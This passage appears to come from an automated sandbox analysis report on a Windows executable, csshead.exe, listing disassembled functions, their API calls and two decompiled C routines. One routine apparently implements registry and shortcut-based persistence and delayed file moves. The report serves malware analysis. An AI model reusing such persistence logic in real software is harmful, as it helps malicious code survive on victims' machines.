      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    • GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004117F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
    APIs
    • GetWindowLongA.USER32(00000000,000000FC), ref: 004118AF
      • Part of subcall function 00411030: CallWindowProcA.USER32(?,?,?,?,?), ref: 00411046
    • GetWindowLongA.USER32(00000000,000000FC), ref: 004118D7
    • SetWindowLongA.USER32(?,000000FC,?), ref: 004118E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042CD2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
    • _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • _parse_cmdline.LIBCMT ref: 0042CDC3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00420EC0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59string
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411910, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
    APIs
    • MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
    • MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
    • GetMonitorInfoA.USER32 ref: 0041196C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0040763C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 100%
    			E0040763C(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				long _v16;
				intOrPtr _t12;
				intOrPtr _t18;

				_v8 = __eax;
				_v12 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0);
				if(_v12 == 0xffffffff) {
					_t12 =  *0x40a248; // 0x4020bc
					return E00407240(_t12, __eflags);
				}
				_v16 = GetFileSize(_v12, 0);
				_t21 = _v16;
				if(_v16 == 0) {
					_t18 =  *0x40a248; // 0x4020bc
					E00407240(_t18, _t21);
				}
				return CloseHandle(_v12);
			}








    0x00407642
    0x0040765e
    0x00407665
    0x00407692
    0x00000000
    0x00407697
    0x00407673
    0x00407676
    0x0040767a
    0x0040767c
    0x00407681
    0x00407681
    0x00000000

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407658
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040766D
    • CloseHandle.KERNEL32(000000FF), ref: 0040768A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00413B20, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18registryclipboard
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B34
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 00413B48
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413B54
    Strings
    • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 00413B43
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00413B70, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18registryclipboard
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B84
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00413B98
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413BA4
    Strings
    • WTL_CmdBar_InternalGetBarMsg, xrefs: 00413B93
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00424397, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryLIBRARYCODE
    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,004243CF,?,?,0042BFFB,000000FF,0000001E,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 004243A1
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004243B1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00413570, Relevance: 6.1, APIs: 4, Instructions: 119
    APIs
    • GetCapture.USER32 ref: 00413587
    • ClientToScreen.USER32(?,?), ref: 004135BE
    • GetWindowRect.USER32(?,?), ref: 004135E3
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?,?,?), ref: 00413659
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 00412881
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 004128B5
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,-00000001), ref: 004128E5
      • Part of subcall function 00412EB0: DeleteDC.GDI32(00000000), ref: 00412ED3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041FF00, Relevance: 6.1, APIs: 4, Instructions: 105window
    APIs
    • SendMessageA.USER32(?,00000409,00000000,00000000), ref: 0041FF4A
    • LoadStringA.USER32(00442B94,?,?,00000100), ref: 0041FFF4
    • SendMessageA.USER32(?,00000409,00000001,00000000), ref: 00420027
    • SendMessageA.USER32(?,00000401,000001FF,?), ref: 0042003C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041D5C9, Relevance: 6.1, APIs: 4, Instructions: 97windowstringcom
    APIs
      • Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
    • EndPaint.USER32(00442AA8,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • lstrcmpi.KERNEL32(?,UnregServer), ref: 0041DA86
    • lstrcmpi.KERNEL32(?,RegServer), ref: 0041DA92
    • lstrcmpi.KERNEL32(?,Automation), ref: 0041DA9E
    • lstrcmpi.KERNEL32(?,Embedding), ref: 0041DAAA
    • Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411530, Relevance: 6.1, APIs: 4, Instructions: 90window
    APIs
    • GetClientRect.USER32(?,?), ref: 00411569
    • GetMenuItemCount.USER32(?), ref: 00411573
    • SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
    • SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411440, Relevance: 6.1, APIs: 4, Instructions: 88window
    APIs
    • GetClientRect.USER32(?,?), ref: 00411479
    • GetMenuItemCount.USER32(?), ref: 00411498
    • SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
    • SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00420A00, Relevance: 6.1, APIs: 4, Instructions: 83
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00420A36
    • FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E), ref: 00420A57
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00420650, Relevance: 6.1, APIs: 4, Instructions: 79
    APIs
      • Part of subcall function 004202C0: SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004202D1
      • Part of subcall function 004202C0: GetWindowLongA.USER32(?,000000EC), ref: 004202F4
      • Part of subcall function 004202C0: GetWindowLongA.USER32(?,000000EC), ref: 00420302
      • Part of subcall function 004202C0: GetWindowLongA.USER32(?,000000F0), ref: 00420311
      • Part of subcall function 004202C0: SetWindowLongA.USER32(?,000000EC,00000000), ref: 0042034C
      • Part of subcall function 004202C0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 00420365
      • Part of subcall function 004202C0: GetClientRect.USER32(?,?), ref: 00420378
    • GetWindowLongA.USER32(?,000000F0), ref: 00420696
    • GetWindowLongA.USER32(?,000000EC), ref: 004206A5
    • GetWindowLongA.USER32(?,000000F0), ref: 004206B0
    • AdjustWindowRectEx.USER32(?,00000000,?,00000001), ref: 004206B8
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E750, Relevance: 6.1, APIs: 4, Instructions: 66window
    APIs
    • SendMessageA.USER32(?,00000410,0000EB01,00000000), ref: 0041E77E
    • SendMessageA.USER32(?,00000423,00000000,00441340), ref: 0041E78E
    • GetClientRect.USER32(?,?), ref: 0041E7C5
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 0041877C
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
      • Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 004187E4
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E7FD
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00412A20, Relevance: 6.1, APIs: 4, Instructions: 63string
    APIs
    • lstrlen.KERNEL32(?,?,00000000,?,7740E270), ref: 00412A33
    • SetTextColor.GDI32(00000000,?), ref: 00412A5B
    • DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
    • DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E810, Relevance: 6.1, APIs: 4, Instructions: 61window
    APIs
    • IsWindowVisible.USER32(?), ref: 0041E81B
    • ShowWindow.USER32(?,00000001), ref: 0041E836
    • GetClientRect.USER32(?,?), ref: 0041E86B
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 0041877C
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
      • Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 004187E4
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E8A3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00425504, Relevance: 6.0, APIs: 4, Instructions: 47LIBRARYCODE
    APIs
    • __getptd.LIBCMT ref: 00425510
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __amsg_exit.LIBCMT ref: 00425530
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedDecrement.KERNEL32(?), ref: 0042555D
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • InterlockedIncrement.KERNEL32(00441D00), ref: 00425588
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00425E72, Relevance: 6.0, APIs: 4, Instructions: 45threadLIBRARYCODE
    APIs
    • GetLastError.KERNEL32(?,00000000,004251BD,00422AA1,?,?,00417F96,00000009), ref: 00425E76
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
    • SetLastError.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425EE0
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000), ref: 00425EB2
    • GetCurrentThreadId.KERNEL32 ref: 00425EC8
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041FC10, Relevance: 6.0, APIs: 4, Instructions: 45window
    APIs
    • GetTopWindow.USER32 ref: 0041FC14
    • SendMessageA.USER32(00000000,?,?,?), ref: 0041FC38
    • GetTopWindow.USER32(00000000), ref: 0041FC43
    • GetWindow.USER32(00000000,00000002), ref: 0041FC65
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004140E0, Relevance: 6.0, APIs: 4, Instructions: 45window
    APIs
    • IsWindow.USER32(?), ref: 00414100
    • IsWindow.USER32(?), ref: 00414119
    • SetFocus.USER32(?), ref: 00414123
    • SendMessageA.USER32 ref: 00414141
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041E6E0, Relevance: 6.0, APIs: 4, Instructions: 45window
    APIs
    • TranslateAccelerator.USER32(?,?,?), ref: 0041E6F5
    • TranslateMDISysAccel.USER32(?,?), ref: 0041E704
    • SendMessageA.USER32(?,00000229,00000000,00000000), ref: 0041E72B
    • SendMessageA.USER32(00000000,0000037F,00000000,?), ref: 0041E73A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004171E0, Relevance: 6.0, APIs: 4, Instructions: 44window
    APIs
    • GetFocus.USER32 ref: 0041720A
    • GetFocus.USER32 ref: 00417220
    • SetFocus.USER32(?), ref: 0041722C
    • SendMessageA.USER32(?,00000419,?,00000000), ref: 00417241
      • Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416F08
      • Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00416F2D
      • Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,0000041D,00000002), ref: 00416F3C
      • Part of subcall function 00416ED0: GetSubMenu.USER32(?,?), ref: 00416F7D
      • Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416FB0
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000001), ref: 00416FC8
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00416FD6
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000000), ref: 00417026
      • Part of subcall function 00416ED0: GetFocus.USER32 ref: 0041702B
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041703F
      • Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00417083
      • Part of subcall function 00416ED0: PtInRect.USER32(?,?,?), ref: 00417098
      • Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 004170B7
      • Part of subcall function 00416ED0: RtlEnterCriticalSection.NTDLL(00442A20), ref: 004170DB
      • Part of subcall function 00416ED0: RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 004170EF
      • Part of subcall function 00416ED0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 004170FB
      • Part of subcall function 00416ED0: PostMessageA.USER32(?,00442B50,?,00000000), ref: 0041711C
      • Part of subcall function 00416ED0: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00417140
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00417195
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000449,00000001,00000000), ref: 004171A4
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00426034, Relevance: 6.0, APIs: 4, Instructions: 34
    APIs
    • TlsGetValue.KERNEL32(?,?,00423C05,00000000), ref: 00426055
    • TlsGetValue.KERNEL32(?,?,00423C05,00000000), ref: 00426067
    • RtlDecodePointer.NTDLL(00000000), ref: 0042607D
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
    • TlsSetValue.KERNEL32(00442050,00000000,?,00423C05,00000000), ref: 0042609A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00419390, Relevance: 6.0, APIs: 4, Instructions: 30window
    APIs
      • Part of subcall function 00419220: GetMenuItemCount.USER32(?), ref: 0041922F
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
      • Part of subcall function 00419220: lstrcmp.KERNEL32(?,&Window), ref: 004192E4
      • Part of subcall function 00419220: GetSubMenu.USER32(?,?), ref: 00419317
    • SendMessageA.USER32(?,00000230,?,00000000), ref: 004193B4
    • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004193C3
    • GetParent.USER32(?), ref: 004193C9
    • DrawMenuBar.USER32(00000000), ref: 004193D0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00419340, Relevance: 6.0, APIs: 4, Instructions: 29window
    APIs
      • Part of subcall function 00419220: GetMenuItemCount.USER32(?), ref: 0041922F
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
      • Part of subcall function 00419220: lstrcmp.KERNEL32(?,&Window), ref: 004192E4
      • Part of subcall function 00419220: GetSubMenu.USER32(?,?), ref: 00419317
    • SendMessageA.USER32(?,00000230,?,00000000), ref: 00419364
    • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00419373
    • GetParent.USER32(?), ref: 00419379
    • DrawMenuBar.USER32(00000000), ref: 00419380
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041FB20, Relevance: 6.0, APIs: 4, Instructions: 27
    APIs
    • GetParent.USER32(?), ref: 0041FB2D
    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041FB3A
    • GetParent.USER32(00000000), ref: 0041FB41
    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041FB48
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004076A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146
    C-Code - Quality: 93%
    			E004076A0(int __eax, void* __ebx) {
				int _v8;
				char* _v12;
				char* _v16;
				char _v273;
				char _v530;
				void* __ebp;
				int _t38;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				intOrPtr _t92;
				long _t97;
				long _t99;
				long _t100;
				intOrPtr _t102;
				void* _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t113;

				_t38 = __eax;
				_v8 = __eax;
				if( *0x40b514 > 0 &&  *0x40b510 != 0) {
					E00401308( &_v530, 0x40b518);
					 *((char*)(_t111 + E004012DC(0x40b518) - 0x212)) = 0;
					E0040133C( &_v530, ".lnk");
					_t113 = _t112 + 8;
					_t96 =  &_v530;
					_t102 =  *0x40a0ac; // 0x401c58
					_t46 = E00403FC8(0x40b518, __ebx,  &_v530, _t102);
					asm("sbb eax, eax");
					if( ~( ~_t46) == 0) {
						E00401308( &_v530, 0x4078ec);
						E0040133C( &_v530, 0x40b518);
						E0040133C( &_v530, 0x4078f0);
						_t92 =  *0x40a0ac; // 0x401c58
						E0040133C( &_v530, _t92);
						_t113 = _t113 + 0x18;
					}
					if( *0x40a034 == 0) {
						_t50 = E00404968(0x80000001, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t50);
						if(_t38 != 0 &&  *0x40b514 > 0 &&  *0x40b510 != 0) {
							_t97 =  *0x40b514; // 0x0
							_t104 =  *0x40b510; // 0x0
							E0040485C(0x40b518, _t97, _t104);
							return E0040763C(0x40b518);
						}
					} else {
						_t57 = E00404968(0x80000002, _t96,  &_v530);
						asm("sbb eax, eax");
						_t38 =  ~( ~_t57);
						if(_t38 != 0) {
							if(_v8 != 0) {
								_t100 =  *0x40b514; // 0x0
								_t109 =  *0x40b510; // 0x0
								E0040485C(0x40b518, _t100, _t109);
								return E0040763C(0x40b518);
							}
							E00401308( &_v273, 0x40b518);
							_v12 =  &_v273;
							_v16 = 0;
							while( *_v12 != 0) {
								if( *_v12 == 0x5c) {
									_v16 = _v12;
								}
								_v12 = _v12 + 1;
							}
							if(_v16 == 0) {
								_v16 =  &_v273;
							} else {
								_v16 = _v16 + 1;
							}
							 *_v16 = 0;
							_v12 = E00403B80(9, 0x19, 0x14);
							E0040133C(_v16, _v12);
							E00401440(_v12);
							E0040133C(_v16, ".txt");
							_t38 = MoveFileExA( &_v273, 0x40b518, 4);
							if( *0x40b514 > 0 &&  *0x40b510 != 0) {
								_t99 =  *0x40b514; // 0x0
								_t108 =  *0x40b510; // 0x0
								E0040485C( &_v273, _t99, _t108);
								return E0040763C( &_v273);
							}
						}
					}
				}
				return _t38;
			}
























    0x004076a0
    0x004076a9
    0x004076b3
    0x004076d1
    0x004076e0
    0x004076f4
    0x004076f9
    0x004076fc
    0x00407707
    0x0040770d
    0x00407714
    0x0040771a
    0x00407727
